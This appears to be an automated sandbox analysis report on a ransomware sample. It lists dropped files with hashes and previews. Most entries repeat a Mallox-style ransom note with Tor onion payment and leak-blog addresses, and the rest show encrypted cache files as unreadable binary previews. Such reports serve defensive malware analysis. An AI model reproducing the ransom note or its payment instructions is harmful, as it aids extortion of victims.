                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\FontCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\GameDVR\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\History\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012023100320231004\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012023100420231005\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\History.IE5\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):415902
                        Entropy (8bit):7.998496797278906
                        Encrypted:true
                        SSDEEP:12288:HeLN2LlwW5fNpNt6WD1TU/jh+7SPtNxTmBpjyHaq3BpU:+adjp2WDNwh0ShTmDjyHdB2
                        MD5:99C2608E03904C41BA8EDAADC3D2CEE1
                        SHA1:B013943BB9DA41454AD27863C00BB5987FF7E081
                        SHA-256:5BA62BD14C8193F91FF3042C323A1681A4CE86141F9C465EA0F4FFD2C0F09552
                        SHA-512:8C145167DC542772EBD1EFEAD4DF3F331A37E52D4F365A8FB2A05E1F6B95D9AA576E9F84C7D89DB0B07E76C6A1D227B5020568F5FFBD4940A82C17E102508B97
                        Malicious:true
                        Preview:..3.F...JhV.8.H..E7b.x.^0g..pmE.yV.5.<'.t..5..p]..2...u.v..*p.h.u=+..Jp..Bmu.>....<...G..e..6...Q..$...o.<9....L..-....av....jNO........K{BD...nKe.u.....>..Lt..4.....R].*...dWW...J......s.`q.[>.#.....m$.....Jz?.9..T.(....J......N)..I%.L.p.W'l.^.W.l......JX!.^...va...'.wqQw.......4687...I..`EO.:.L...A.B&..4.U.8![.SCs.f.I+2.V.m......!.v../..7A..|.r-...X.-...j5...6.WD/..r-..5.&.n...!..[/e.~ix.DR.....%..~...G"..&.OI..N3...c6n...t.S.T]M......!{$`c.......i.d,ZB..N.;..z._..~P....S#.K]*.D...?......k.P[..,d.4).I...[^Q.3Q....F>..<c,^...-..z....x...... %...xA.....Zw......}FQ.Y.]P....F.{.$.SS...<.....p....2}Y..<..Y..QO`....-....C.R....0.............y...M.BN..3...3.".Ga{............'.lP..6o..g..4.5..DJ.Y.Ha.....K.........e.*gbE..#..9h.%.D1f .......&OP&......j.....\..*.r...E..~....;1..g.........J9.`Q.......y~.:R...y0....Za*NcE.....e..$..*m.P`.Y>*.k.......V.K#_..;.?+.Z..gU<S)...I.-...m.....H.....Q.O....a.w+.....q..Rh.....j0x..Vn...}My.....#........

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2[1].css

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):110750
                        Entropy (8bit):7.997061426978724
                        Encrypted:true
                        SSDEEP:3072:18XJFib7TIB49TcD0lge/2v+lfW+Z/2Bp1J:4YT3lge/0w++FUpD
                        MD5:27CB60739CF0DCA910721AC2B08F9258
                        SHA1:E8E8FE56BAA0C345322CC2907243F562EBB929DD
                        SHA-256:779B14B860484D65FF81141F63CC4725F70505098620A41AFABEA19D8AF420EC
                        SHA-512:95EC7F8B6A4B6AC76EC0D865DF7AF599C78FAB9F176AE3723C9534596D347CE5CEEC2C83E20949EFCEFEE3448C716CB374A385E9DD11859EC99E07A72136A3F3
                        Malicious:true
                        Preview:..0..j.x..lj.Xz.#]q....bel..Hb.W...C....s.0.UH....Z. ...I..Ch-5...`............../....P9..:.. Y..8p.........C.9..W{u'..g..V.....*?.....JE.?..|...5Lt.....p.....kM....6p.]K..... x....k5ieQ{Q}1...P..Z...6.}...4.R4.SR...[\.._....RY2..r.F#.1.L........^;...R.f...t.l.A.e.....!g.aV..3|GM.}t!5.....z.F..n@.v78.X.Q..,o....k!.~o.\.........NH...?.....b\....>...P..?>..e..z...^..5.>...\^.v..@o.~.>o.......cT.~aV..;#.W.......CW.g...F...K....bk....t..:..>l..O*&.l..hR..d..1`..Hv$nA9\....&..4.."..]..L8...i.a...r....t..J.1.&.Z.....J.h.h....ZZXk!......(.T.|.Y.E....n......j...oC...k.....]........\Gz....-.....(....f.3....x.j...... ~.&i5....8.+."..(..).?!.....8..`".|....F....@.:.9.....%..C....(b...+.Va...@.Zz.~=..U.f.H...96.S.k.......Y...Sbd.9...\.gY.z.../.....h....#.}=?J9.6f.i..3.s.j.E.....m..kp..y...........N.5NH.j.,.1...$..C]2+Q...[LVG..o1...]i......-..I.4./l..m....#.%.c.n.j......p.5..S+..c...-.P...i."8m....+Zw..5..C....-%.M.~....L...@.._D..b.~b.....6..T..f...!c.7I..?.

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\toptraffic[1]

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):461100
                        Entropy (8bit):7.999573229253025
                        Encrypted:true
                        SSDEEP:6144:/SkC9QkRLTi/W0XFIkAE2zyVlm+D0XkYIvGqySfPkdm5GkX/YmxptWlDxZgVkGF:JCSuS/NFzAA3mkNu/SfPrGy/TtWl3gfF
                        MD5:A742E7B92BABB9B774423FC17848300B
                        SHA1:202C5282B0B81BBC3CA644A8E09C5DB30C272B87
                        SHA-256:17561D51A70E3422D946C10E645F1B79284437E98EE584FE2A68EF5EAB00FC97
                        SHA-512:33AAB3D6CE62D3300A520D951B7174300493FCE31D2903E8079B0E0E65151E9F8BE0E357EBBAB1612D283BE8B60F8F6CF49C08BBDB33F16C937BF706586BCC53
                        Malicious:true
                        Preview:.g..<I.A.<...%.hB..,..|..K.N...L!.u....<..".=.1@......0."....4A......^...iV.K..azL..Y..:.2K+[P....a..:.d.{....oH.,6.W..W+..B...^...a.{......|..Zj.S.y*"XY..$.ow..N........VGkjWx.E.s......I.A.r..M..?M..........K.......5....{..G.f..b.4.B;nD&....M....:.#.B%|.,.W....k......1r..!P..M.y,"..#E...e.R8.......|m..t.~.&...%.O.L.R....g........S*. .&.)V.:T.;+L..3....R|Pl.}^..V.GN.Z....6...,...uF...q...Z..}.xN....Q.5..~..{.o.~.0...@..~.z..k\4..S..I...m..P.IJO.{.qQRf5.P.9...'..;._.OC..?>.0....O.2.[.p.....:..u.y.J-X....v...0.6.mNb....l$.}....nD......j...T.*.......j.(C...".v......-..h@N...It.G..-.....L.@q<n......+.....SZ30GM.2.|10..bAvJ...D^z....V..m...0l#1G..E..*L......y....5.NW<..a.v.........5{hS..K.......K........D....Cg%...%..O.x..-..\...l...C.......Zi.`9..#*.... Y.....#.....N.5L.v..1..k...v.dP.(r..A.}.[].r.!...IWd>........m.........hMO.j.....k.8....2..p........YE.gU..I..6..?._..C.~.M..2..h.4v.|....X.s.l..}n.f..S..]q=.1|.....v.e1S.....@e.5.#_W.....(.cE

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\2[1]

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):31270
                        Entropy (8bit):7.994218858429626
                        Encrypted:true
                        SSDEEP:384:AiHQkBbZG/J2Q9G3Vkfsdiibw9udg8XLHEck8BMM9wA70uVlk8R4xWgxx5tBa0Gb:BHQoGnQyOxOudgcj3k855rk8q/xm0XMx
                        MD5:68BF113F4B4A000791905787C19F282C
                        SHA1:A7022674E0ED8A35D4736247B18A931F727E1036
                        SHA-256:08A5A2F60E6C6C24D9E09FEEFCA442B11B206E4A7942E80310DD3682F4EF47E2
                        SHA-512:4E7108D8946A02BB334A128CFF8C85016D7C1E2895BFFCD94495696A0F9D9C49D86250ED8EB129BEC2C298E09898E6974E21853338C7B44FB157A40B2E859A27
                        Malicious:true
                        Preview:.};*p.....-........RL..G}....qC.;p..I.v]Sw...3....V[..i....F....,..-..#..m.....`.OZ.,..0.[..%.U....$%,../.#..\.&_bz.o&..hdR7.:O%....R....>..C~..a...e..:.dYj..f..yl...r..]...|P..~C/-c.PM7... ...Z..g..|&..e.....`.'x..~..y.WN7 1Z..?b..b8{!...l..e.....@F......fGq}$|.....R..w.N|.n.d........~..kB......5.\......b.&..xgY...8.>vR.aG......E.l`...A+G.`x..r..Q.e.!....;_....X../.....x."r9.%G.mo.Tt._;r...z1l.fdt&).e..Kr.Qb.*.:.R.......CO......t......(;V.B..G...p.Dl5..e.,.vq..heVz)..Uh8.o.">.W`x......r.......X./..mZ...:.0.Y{|J.y.[...q........}.R^.%.P.c..4`tA.Xno!*..#.C..:...Kea...a>.~...?j....k...&$.91..W......G....t...y....lA......u.\..1......... *.[i....[.. .....N..Q..r.:.!h.{.[...;.bgS..t.3|b....b.u5p..H..k..L.E;.m....=A].H./..{n7z.E...,....pHp!r ...Y."......@.e~o../.....Qut..\.I..x..g.U.~V'$&\&=..i....ro...&.;.......Qg......"...%`.F.t...e...2..... ~.Ux...../M....;............U.l>...P.. 8..'?....] 8CO.......ra.K..J.N._J".=].J..H.'.....ws.Ug-..N.W!....

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):418306
                        Entropy (8bit):7.99832932960572
                        Encrypted:true
                        SSDEEP:12288:y69HIO7PVtpdmfsPUGtQcMRVdGNkm+uxGc7hd:nIov/Os8GtQBAGvu3d
                        MD5:4275A50BFE6D57E484B7279A9380D3A7
                        SHA1:6F7A61D055F7B694C3C16D50A2AA2A5481BBCE62
                        SHA-256:CE9390B22D640690F3E5FCAF5EC17A7A98F6A57A7C852E6502FCFA300DCD4FA5
                        SHA-512:575A0106480AEDEBF67D48E5DCA4AD97ED9C3F6E0A3205B05EC45D82EF14036F877ECAA887B48C7519A39366DE63C80F84221DBA9C195D8568830C0E68614BC2
                        Malicious:true
                        Preview:.5[....PW.9*.....g".....C......8...!.....i..!..C..^.rD...{u. ..on..r...a....RT.....:O.3........{.F7.A..H..,..YS.ia.$..AZ..v_R.gG.......T.d...&..M.....%...%.....U...D=...F..3b.~T.....@.}.....~.s.........v.........A.......s9.;/n.....a.^.i..y...?f.\.~...x.5..............dR^..0.....)o..z.a.....HCv..s8...f.J....0..Uc..EfV..>....G....J?6.1 Z....Lv..A.Hx.w...&l.-5.4z...CF{}.y.0k[.......e.Vb. ...W.K...O..........._.....Tg._."9..R....]N6.p..5..UN=.r...|.w&.R.q...q.....g...;|..+.i1\....p.Ms...L.UO.FS.q...t..N.A....W;B.C.........3..4+..w......j..^.L...)NH$_...i....j.|...pK..6.-.@.@...........R~L.f......Q..RZx.....~.#._O;..B.....K>._.*"..@~..J.o.$Q.#.\ *..b.......2!s....}.m#..a...0..X..L=.^..4(.P..&.::.."L....q.z.....F..'nu~)9<Y..d...GV.KE<...3c..C.W..`....c.>...8U#..;..S.........*.h.).q....$.ef.....tQ.}..D.[...h..v2..&N.R_.5>.V.....^.".ne.iF[7.s...$...:......s.G.........'<..`h=....A."...........\D.H......1......2@....O..<l.Y2.$.....

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2[1].css

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):110559
                        Entropy (8bit):7.991472983456805
                        Encrypted:true
                        SSDEEP:3072:cY1tMsKrytgb5tSpIGEE6cb8DnrgSc2lth1I1ys1sA4gD:cItMsouIGE9XgYRgysqA4o
                        MD5:30FF291793EBAB27BF62A04BB0624315
                        SHA1:95B52EC787FACC2C457F2C1CE1460B44F32E5DDD
                        SHA-256:18382976599E38430EFF0027E5D1530BB99A3313814CDAF82C572AD928400E54
                        SHA-512:2A3D6498CCB11E8325749D9D421D38468C621D63E91F713032F22D0A9A96D8670DB9F5037D01C15B9B57619C51758E0D25F9AEECE3BD3F92CB4EC6531E546157
                        Malicious:true
                        Preview:.;..}.....aE..@..(_x..m.^{v..d./`..,.......@..;......G......{}.k....e......b.a...%....3..$.0C......;;Y.C....oq..Wi..K0)-...\l*.!...N.U........)..2. f.._}.....W...oj...........q..vLnO6M....,a0H..9L.8..u...o...m...i .....>fg'.7.A[.k?w@.w..K.-. .+...H..V..t.wP...^Ul.L;...3.~']z.g.S.........I......+...D...p~).q.1.d....\P...8.$.t..~<Ch..On?i...h.h.J...Z..E...?......C........K..._..l`..#.#....0.hD.t...R.S....3.@..|[mu).N....Ip}.V. ..=..a..rR+.sV7. ...:ci.y..2.Ez...|_.6t..K^gT. .S.......".g._i.OG.>e|~.ww#$xv..E3.....$.E8.z#..\E.Q:>\..8.d.8:.........UKP)..).vd.i.Mn.$.%...F...Z...:&|.W.Rd............lZ...M...My..1'8....".:]..2t.w...b!...+o.6:...Lx.v.L.0O...M.u....b....)..O..v..V.;%..2.....n...<.X.P.-...A.z&.4..s.U.eN...s.Y.S2.0...aJ..(..`#A..y.mG...B\.T.].......B=.-.....H...u4..^..Q.<....Suk.Z/....f(...8.....i.h.M..48.l...qD.P.....f....:......[f|..D..;;f..&...%..h.U.E..igP....Cdvf....W.D.l...}.../v...J.:....w......:=*u..H+..&.\r..N

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\2[1]

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):82894
                        Entropy (8bit):7.99782630692173
                        Encrypted:true
                        SSDEEP:1536:RmGuto6ygVkVBUSACkMVk9/uvh6XoSMHhhXx5KnFDE9bM/U3/xlS3U1Q4Jsi5LuD:41ymkVcVMkIh6XoSMHhhh5Knq9I/mj1S
                        MD5:FC8373C90A2C7BCEF644CDAF03DCDB6E
                        SHA1:A1489DFDFA5EF0F39349830CA7A3CA6E5B2A3761
                        SHA-256:525A7E981DC111A2BAE480504B578E811611A89B84A8F471C7A2A0CEF972C96C
                        SHA-512:E4EB9F62D7346B74C2919C5A89D6C7B8C885BCEA88DFD6D18BA032E94D34B2240160C014C41F7964B56275A0A85164CFCAD42679466B1D7ABD3036A7D4C3B62B
                        Malicious:true
